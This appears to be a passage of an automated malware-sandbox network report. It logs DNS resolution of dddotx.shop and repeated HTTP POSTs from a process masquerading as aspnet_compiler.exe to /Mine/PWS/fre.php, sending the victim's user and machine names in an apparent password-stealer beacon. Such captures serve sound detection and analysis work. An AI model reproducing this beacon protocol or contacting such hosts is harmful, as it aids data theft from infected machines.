                                      Oct 24, 2024 17:03:52.944607973 CEST5004280192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:52.950649977 CEST8050042188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:53.078692913 CEST5004380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:53.084151030 CEST8050043188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:53.084243059 CEST5004380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:53.086359978 CEST5004380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:53.091696024 CEST8050043188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:53.091767073 CEST5004380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:53.097157955 CEST8050043188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:56.758740902 CEST8050043188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:56.758959055 CEST5004380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:56.761482954 CEST8050043188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:56.761548996 CEST5004380192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:56.764327049 CEST8050043188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:56.904330969 CEST5004480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:56.909961939 CEST8050044188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:56.910064936 CEST5004480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:56.911874056 CEST5004480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:56.917267084 CEST8050044188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:56.917337894 CEST5004480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:56.922728062 CEST8050044188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:58.361933947 CEST8050044188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:58.362070084 CEST5004480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:58.363658905 CEST8050044188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:58.363746881 CEST5004480192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:58.367517948 CEST8050044188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:58.498696089 CEST5004580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:58.505397081 CEST8050045188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:58.505460024 CEST5004580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:58.507231951 CEST5004580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:58.513444901 CEST8050045188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:03:58.513506889 CEST5004580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:03:58.519690037 CEST8050045188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:03.634898901 CEST8050045188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:03.635175943 CEST5004580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:03.635195017 CEST8050045188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:03.635257006 CEST5004580192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:03.640563011 CEST8050045188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:03.793162107 CEST5004680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:03.798623085 CEST8050046188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:03.798719883 CEST5004680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:03.801635981 CEST5004680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:03.806978941 CEST8050046188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:03.807044029 CEST5004680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:03.812526941 CEST8050046188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:04.695522070 CEST8050046188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:04.695816040 CEST5004680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:04.697179079 CEST8050046188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:04.697242975 CEST5004680192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:04.701191902 CEST8050046188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:04.854639053 CEST5004780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:04.860356092 CEST8050047188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:04.860595942 CEST5004780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:04.863425970 CEST5004780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:04.868875027 CEST8050047188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:04.868949890 CEST5004780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:04.874497890 CEST8050047188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:06.227567911 CEST8050047188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:06.227709055 CEST5004780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:06.230074883 CEST8050047188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:06.230140924 CEST5004780192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:06.233149052 CEST8050047188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:06.381342888 CEST5004880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:06.386893988 CEST8050048188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:06.387260914 CEST5004880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:06.389303923 CEST5004880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:06.395539999 CEST8050048188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:06.395714998 CEST5004880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:06.401730061 CEST8050048188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:07.730067968 CEST8050048188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:07.731990099 CEST8050048188.114.96.3192.168.2.5
                                      Oct 24, 2024 17:04:07.732121944 CEST5004880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:07.732225895 CEST5004880192.168.2.5188.114.96.3
                                      Oct 24, 2024 17:04:07.737626076 CEST8050048188.114.96.3192.168.2.5
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 24, 2024 17:02:06.678858042 CEST5875453192.168.2.51.1.1.1
                                      Oct 24, 2024 17:02:06.714082956 CEST53587541.1.1.1192.168.2.5
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 24, 2024 17:02:06.678858042 CEST192.168.2.51.1.1.10x3590Standard query (0)dddotx.shopA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 24, 2024 17:02:06.714082956 CEST1.1.1.1192.168.2.50x3590No error (0)dddotx.shop188.114.96.3A (IP address)IN (0x0001)false
                                      Oct 24, 2024 17:02:06.714082956 CEST1.1.1.1192.168.2.50x3590No error (0)dddotx.shop188.114.97.3A (IP address)IN (0x0001)false
                                      • dddotx.shop
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:06.727760077 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 180
                                      Connection: close
                                      Oct 24, 2024 17:02:06.733299017 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: 'ckav.rualfons849224ALFONS-PCk0FDD42EE188E931437F4FBE2CvHTg2
                                      Oct 24, 2024 17:02:07.685256958 CEST766INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:07 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMgj9mb5DVhPQViilaESkMqQRNq75FkFzoI86%2B%2FLSOAstlIlwPiQL5h74cjUZCc7p7UBysTTZ19hMyz8nMFB9yvoSMJmcAKMHPBnBPfu0MDayVtGoP9OvZG%2BLllipw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8977ab9485e-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1746&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549705188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:07.824615955 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 180
                                      Connection: close
                                      Oct 24, 2024 17:02:07.830535889 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: 'ckav.rualfons849224ALFONS-PC+0FDD42EE188E931437F4FBE2CHPmgE
                                      Oct 24, 2024 17:02:08.867274046 CEST760INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:08 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTgg0Dw5vE2UisjnEfC4BAsTXGh8I6382tPffjx4Io4jsQ0Bpny6tTBVbkXqGg8FbI1f1OZf63b9gy6ZnjHHDQ8SB1CYA3dONWutngFsL6A3O5U4hTCnHH5MVQdhpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad89e3be3e94e-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549706188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:08.928268909 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:08.934077978 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:10.024525881 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:09 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p55%2BKJFax3KSWn7A8mrMkWn0ROBaqIS7qZnfZUPsgUBgqWcxHJ%2BJtEREWuekuQUTOm2FDg9DkVk%2FfJ18QUGrjbRp5%2B68%2B082QJIBFK5XZf9gK9TOuSkLPlk6dUEAlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8a538e84786-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549707188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:10.179774046 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:10.185322046 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:11.080620050 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:11 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aZ%2Bk8VVpUjHRRvmiOKUeB72I%2BuC1srKilKQGSpyE3xN32f826mjJThsLfS4K1qWH7nVn9Ut0jr2pzzWYLV1s7r9awm2dYPjPiIggyly3zzanBcNux6ImQEpyM7I6uA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8acfa6a6b97-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.549708188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:11.230082989 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:11.235526085 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:12.208580017 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TkBtg6ovQ5AdrN7h%2B2%2B%2F6p9NK004BkB9%2FhcWPdGyEP62UNdgjRM04rKchs7oORPcWsthMRlzjzzZy3jA2aj%2BFx8vJ6pjmbDLKT1K9Sb974wIoheJsvCXDSXf6Sahw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8b39d5245fb-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.549709188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:12.355288982 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:12.361135006 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:13.386910915 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:13 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0FNuz6F2UoI5GClneaGIROudjT4PRp%2B3IDQLFMOKtuQGk1T8lkOy%2Fgjap3lsUGwZCie7t9eX%2Fcy2hZDMKL9REwBKiQ23%2BXRqMN88lkc1x3sJA2daaSbyKISz8N95g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8ba9d936c07-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1813&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.549710188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:13.543705940 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:13.549320936 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:16.922208071 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:16 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iH4Fa8tLW9McLFlEhMKCEI7kfWqKuNzQHDc8ULdEonwEx3GQFadEs606zJZCMnQnYTQLDoE6zYTG8RaYe384EQ3ACmAjKA5M7oJEiV%2BlYH%2BUuXiivqTWodT0fHWxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8c1fee26b06-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.549717188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:17.072479010 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:17.079418898 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:20.447261095 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:20 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJOB3EqGfH%2Ferx6aJhQ6IR7IIiIetPbHGnxenIGVgYHUVNnD%2BbGvys3z%2BbYvnFzwokqpMKMEIUfdX92Ff9m4W2hlYnQZQ8P3ifyI4froXDHsRnpVr%2BWEGnJySGp7cw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8d82d666b27-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2279&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.549735188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:20.602596998 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:20.619456053 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:21.532000065 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:21 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecqebKWXcrDHQbdTvxQvwg0fTJ%2Fp1F9iS96GakokyRmu%2Fkux%2Bjx6xK6DmtAvHcSYlB5HnuHbwh5kZXdQ3lupVJUVC7SFDY9lpzBC7hAZmP0OHyAwKTCfgGbnp2CSjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8ee6a696c39-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.549745188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:21.685997009 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:21.691586971 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:22.993580103 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:22 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
